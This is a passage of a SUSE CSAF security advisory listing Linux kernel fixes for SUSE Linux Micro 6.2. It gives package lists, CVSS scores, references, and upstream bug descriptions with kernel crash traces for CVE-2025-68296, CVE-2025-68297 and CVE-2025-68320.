"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68296",
"url": "https://www.suse.com/security/cve/CVE-2025-68296"
},
{
"category": "external",
"summary": "SUSE Bug 1255128 for CVE-2025-68296",
"url": "https://bugzilla.suse.com/1255128"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68296"
},
{
"cve": "CVE-2025-68297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix crash in process_v2_sparse_read() for encrypted directories\n\nThe crash in process_v2_sparse_read() for fscrypt-encrypted directories\nhas been reported. Issue takes place for Ceph msgr2 protocol in secure\nmode. It can be reproduced by the steps:\n\nsudo mount -t ceph :/ /mnt/cephfs/ -o name=admin,fs=cephfs,ms_mode=secure\n\n(1) mkdir /mnt/cephfs/fscrypt-test-3\n(2) cp area_decrypted.tar /mnt/cephfs/fscrypt-test-3\n(3) fscrypt encrypt --source=raw_key --key=./my.key /mnt/cephfs/fscrypt-test-3\n(4) fscrypt lock /mnt/cephfs/fscrypt-test-3\n(5) fscrypt unlock --key=my.key /mnt/cephfs/fscrypt-test-3\n(6) cat /mnt/cephfs/fscrypt-test-3/area_decrypted.tar\n(7) Issue has been triggered\n\n[ 408.072247] ------------[ cut here ]------------\n[ 408.072251] WARNING: CPU: 1 PID: 392 at net/ceph/messenger_v2.c:865\nceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072267] Modules linked in: intel_rapl_msr intel_rapl_common\nintel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery\npmt_class intel_pmc_ssram_telemetry intel_vsec kvm_intel joydev kvm irqbypass\npolyval_clmulni ghash_clmulni_intel aesni_intel rapl input_leds psmouse\nserio_raw i2c_piix4 vga16fb bochs vgastate i2c_smbus floppy mac_hid qemu_fw_cfg\npata_acpi sch_fq_codel rbd msr parport_pc ppdev lp parport efi_pstore\n[ 408.072304] CPU: 1 UID: 0 PID: 392 Comm: kworker/1:3 Not tainted 6.17.0-rc7+\n[ 408.072307] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\n1.17.0-5.fc42 04/01/2014\n[ 408.072310] Workqueue: ceph-msgr ceph_con_workfn\n[ 408.072314] RIP: 0010:ceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072317] Code: c7 c1 20 f0 d4 ae 50 31 d2 48 c7 c6 60 27 d5 ae 48 c7 c7 f8\n8e 6f b0 68 60 38 d5 ae e8 00 47 61 fe 48 83 c4 18 e9 ac fc ff ff \u003c0f\u003e 0b e9 06\nfe ff ff 4c 8b 9d 98 fd ff ff 0f 84 64 e7 ff ff 89 85\n[ 408.072319] RSP: 0018:ffff88811c3e7a30 EFLAGS: 00010246\n[ 408.072322] RAX: ffffed1024874c6f RBX: ffffea00042c2b40 RCX: 0000000000000f38\n[ 408.072324] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 408.072325] RBP: ffff88811c3e7ca8 R08: 0000000000000000 R09: 00000000000000c8\n[ 408.072326] R10: 00000000000000c8 R11: 0000000000000000 R12: 00000000000000c8\n[ 408.072327] R13: dffffc0000000000 R14: ffff8881243a6030 R15: 0000000000003000\n[ 408.072329] FS: 0000000000000000(0000) GS:ffff88823eadf000(0000)\nknlGS:0000000000000000\n[ 408.072331] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 408.072332] CR2: 000000c0003c6000 CR3: 000000010c106005 CR4: 0000000000772ef0\n[ 408.072336] PKRU: 55555554\n[ 408.072337] Call Trace:\n[ 408.072338] \u003cTASK\u003e\n[ 408.072340] ? sched_clock_noinstr+0x9/0x10\n[ 408.072344] ? __pfx_ceph_con_v2_try_read+0x10/0x10\n[ 408.072347] ? _raw_spin_unlock+0xe/0x40\n[ 408.072349] ? finish_task_switch.isra.0+0x15d/0x830\n[ 408.072353] ? __kasan_check_write+0x14/0x30\n[ 408.072357] ? mutex_lock+0x84/0xe0\n[ 408.072359] ? __pfx_mutex_lock+0x10/0x10\n[ 408.072361] ceph_con_workfn+0x27e/0x10e0\n[ 408.072364] ? metric_delayed_work+0x311/0x2c50\n[ 408.072367] process_one_work+0x611/0xe20\n[ 408.072371] ? __kasan_check_write+0x14/0x30\n[ 408.072373] worker_thread+0x7e3/0x1580\n[ 408.072375] ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n[ 408.072378] ? __pfx_worker_thread+0x10/0x10\n[ 408.072381] kthread+0x381/0x7a0\n[ 408.072383] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 408.072385] ? __pfx_kthread+0x10/0x10\n[ 408.072387] ? __kasan_check_write+0x14/0x30\n[ 408.072389] ? recalc_sigpending+0x160/0x220\n[ 408.072392] ? _raw_spin_unlock_irq+0xe/0x50\n[ 408.072394] ? calculate_sigpending+0x78/0xb0\n[ 408.072395] ? __pfx_kthread+0x10/0x10\n[ 408.072397] ret_from_fork+0x2b6/0x380\n[ 408.072400] ? __pfx_kthread+0x10/0x10\n[ 408.072402] ret_from_fork_asm+0x1a/0x30\n[ 408.072406] \u003c/TASK\u003e\n[ 408.072407] ---[ end trace 0000000000000000 ]---\n[ 408.072418] Oops: general protection fault, probably for non-canonical\naddress 0xdffffc00000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68297",
"url": "https://www.suse.com/security/cve/CVE-2025-68297"
},
{
"category": "external",
"summary": "SUSE Bug 1255403 for CVE-2025-68297",
"url": "https://bugzilla.suse.com/1255403"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68297"
},
{
"cve": "CVE-2025-68320",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68320"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlan966x: Fix sleeping in atomic context\n\nThe following warning was seen when we try to connect using ssh to the device.\n\nBUG: sleeping function called from invalid context at kernel/locking/mutex.c:575\nin_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 104, name: dropbear\npreempt_count: 1, expected: 0\nINFO: lockdep is turned off.\nCPU: 0 UID: 0 PID: 104 Comm: dropbear Tainted: G W 6.18.0-rc2-00399-g6f1ab1b109b9-dirty #530 NONE\nTainted: [W]=WARN\nHardware name: Generic DT based system\nCall trace:\n unwind_backtrace from show_stack+0x10/0x14\n show_stack from dump_stack_lvl+0x7c/0xac\n dump_stack_lvl from __might_resched+0x16c/0x2b0\n __might_resched from __mutex_lock+0x64/0xd34\n __mutex_lock from mutex_lock_nested+0x1c/0x24\n mutex_lock_nested from lan966x_stats_get+0x5c/0x558\n lan966x_stats_get from dev_get_stats+0x40/0x43c\n dev_get_stats from dev_seq_printf_stats+0x3c/0x184\n dev_seq_printf_stats from dev_seq_show+0x10/0x30\n dev_seq_show from seq_read_iter+0x350/0x4ec\n seq_read_iter from seq_read+0xfc/0x194\n seq_read from proc_reg_read+0xac/0x100\n proc_reg_read from vfs_read+0xb0/0x2b0\n vfs_read from ksys_read+0x6c/0xec\n ksys_read from ret_fast_syscall+0x0/0x1c\nException stack(0xf0b11fa8 to 0xf0b11ff0)\n1fa0: 00000001 00001000 00000008 be9048d8 00001000 00000001\n1fc0: 00000001 00001000 00000008 00000003 be905920 0000001e 00000000 00000001\n1fe0: 0005404c be9048c0 00018684 b6ec2cd8\n\nIt seems that we are using a mutex in a atomic context which is wrong.\nChange the mutex with a spinlock.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68320",
"url": "https://www.suse.com/security/cve/CVE-2025-68320"
},
{
"category": "external",
"summary": "SUSE Bug 1255172 for CVE-2025-68320",
"url": "https://bugzilla.suse.com/1255172"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
